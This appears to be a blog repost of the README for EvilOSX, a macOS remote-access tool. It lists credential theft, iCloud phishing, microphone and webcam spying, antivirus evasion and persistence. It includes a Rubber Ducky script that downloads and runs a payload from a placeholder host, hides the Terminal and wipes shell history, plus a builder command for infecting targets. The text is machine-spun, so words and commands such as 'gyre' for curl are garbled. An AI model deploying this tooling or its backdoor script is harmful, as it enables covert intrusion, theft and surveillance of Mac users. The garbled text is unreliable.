// ----------------------------------------------------------------------------------------------//
RSS

Evilosx: A Gui Remote Direction Tool For Mac Osx

Posted by Dan's | Labels:


EvilOSX Features:
  • Emulate a lastly instance 
  • Simple extendable module system 
  • No bot dependencies (pure python) 
  • Undetected past times anti-virus (OpenSSL AES-256 encrypted payloads) 
  • Persistent 
  • GUI too CLI support 
  • Retrieve Chrome passwords 
  • Retrieve iCloud tokens too contacts 
  • Retrieve/monitor the clipboard 
  • Retrieve browser history (Chrome too Safari) 
  • Phish for iCloud passwords via iTunes 
  • iTunes (iOS) backup enumeration 
  • Record the microphone 
  • Take a desktop screenshot or motion-picture demo using the webcam
  •  Attempt to larn root via local privilege escalation
EvilOSX Installation too Running
   Open your Terminal too motion into these commands:
   Warning: Because payloads are created unique to the target organization (automatically past times the server), the server must live running when whatever bot connects for the kickoff time.

   For Advanced users: There's also a CLI for those who desire to role this over SSH:
python start.py --builder # Create a launcher to infect your target(s)
python start.py --cli --port 1337 # Start the CLI

Motivation
   This projection was created to live used alongside author's Rubber Ducky, here's the unproblematic script:
REM Download too execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals afterward x seconds
STRING covert -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; gyre -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
  • It takes virtually 10 seconds to backdoor whatever unlocked Mac, which is...... nice.
  • Terminal is spelt that means intentionally, on about systems spotlight won't give away the lastly otherwise.
  • To bypass the keyboard setup assistant brand certain you lot alter the VID&PID which tin flame live institute here. Aluminum Keyboard (ISO) is in all probability the 1 you lot are looking for.
Versioning
   EvilOSX volition live maintained nether the Semantic Versioning guidelines equally much equally possible. Server too bot releases volition live numbered alongside the follow format:
<major>.<minor>.<patch>

   And constructed alongside the next guidelines:
  • Breaking backward compatibility (with older bots) bumps the major.
  • New additions without breaking backward compatibility bumps the minor.
  • Bug fixes too misc changes bump the patch.
   For to a greater extent than information on SemVer, delight view Semantic Versioning 2.0.0.

EvilOSX's Issues: Feel costless to submit whatever issues or characteristic requests here.
 
Contributing: For a unproblematic guide on how to exercise modules, click here.
 
Thanks for:
  • The awesome Empire project.
  • Shoutout to @patrickwardle for his awesome talks, cheque out Objective-See.
  • manwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts (now deleted... permit me know if you lot reappear).
  • The slowloris module is pretty much copied from PySlowLoris.
  • urwid too this code which saved me a lot of fourth dimension alongside the CLI.
  • Logo created past times motusora.
License: GNU General Public License v3.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Posted by Dan's

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)